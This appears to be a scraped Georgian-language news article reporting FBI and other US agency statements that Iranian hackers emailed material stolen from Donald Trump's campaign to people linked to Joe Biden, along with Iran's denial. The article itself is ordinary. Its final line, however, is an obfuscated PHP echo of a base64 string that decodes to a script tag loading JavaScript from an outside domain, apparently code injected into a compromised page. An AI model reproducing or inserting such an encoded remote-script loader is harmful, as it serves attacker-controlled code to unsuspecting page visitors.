celsiusi
ავერსი საქკაბელი

 ირანელმა ჰაკერებმა, აშშ-ის არჩევნებში ჩარევის მიზნით, ყოფილი პრეზიდენტისა და „რესპუბლიკელების“ საპრეზიდენტო კანდიდატის, დონალდ ტრამპის საარჩევნო შტაბიდან მოპარული ინფორმაცია „დემოკრატების“ მაშინდელ საპრეზიდენტო კანდიდატთან, ჯო ბაიდენთან დაკავშირებულ პირებს ელექტრონული წერილების სახით გაუგზავნეს, - ამის შესახებ აშშ-ის ფედერალურმა საგამოძიებო ბიურომ (FBI) და სხვა ამერიკულმა უწყებებმა განაცხადეს.

FBI-მ 12 აგვისტოს დაადასტურა, რომ იძიებდა დონალდ ტრამპის საარჩევნო შტაბის საჩივარს იმასთან დაკავშირებით, რომ ირანმა გატეხა და გაავრცელა სენსიტიური საარჩევნო დოკუმენტები. 19 აგვისტოს კი სადაზვერვო სამსახურის წარმომადგენლებმა დაადასტურეს, რომ კიბერშეტევის უკან ირანი იდგა.

ოფიციალური პირების განმარტებით, არ არსებობს რაიმე ნიშანი, რომ ბაიდენის საარჩევნო გუნდში რომელიმე მიმღებმა ელექტრონულ წერილებს უპასუხა ან ის, რომ წერილების მიმღებებმა მათი წარმომავლობა იცოდნენ.

ირანი უარყოფს აშშ-ის საქმეებში ჩარევას. გაერო-ში ირანის მუდმივმა წარმომადგენლობამ გუშინ განაცხადა, რომ ბრალდებები უსაფუძვლო და სრულიად დაუშვებელია.

83
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");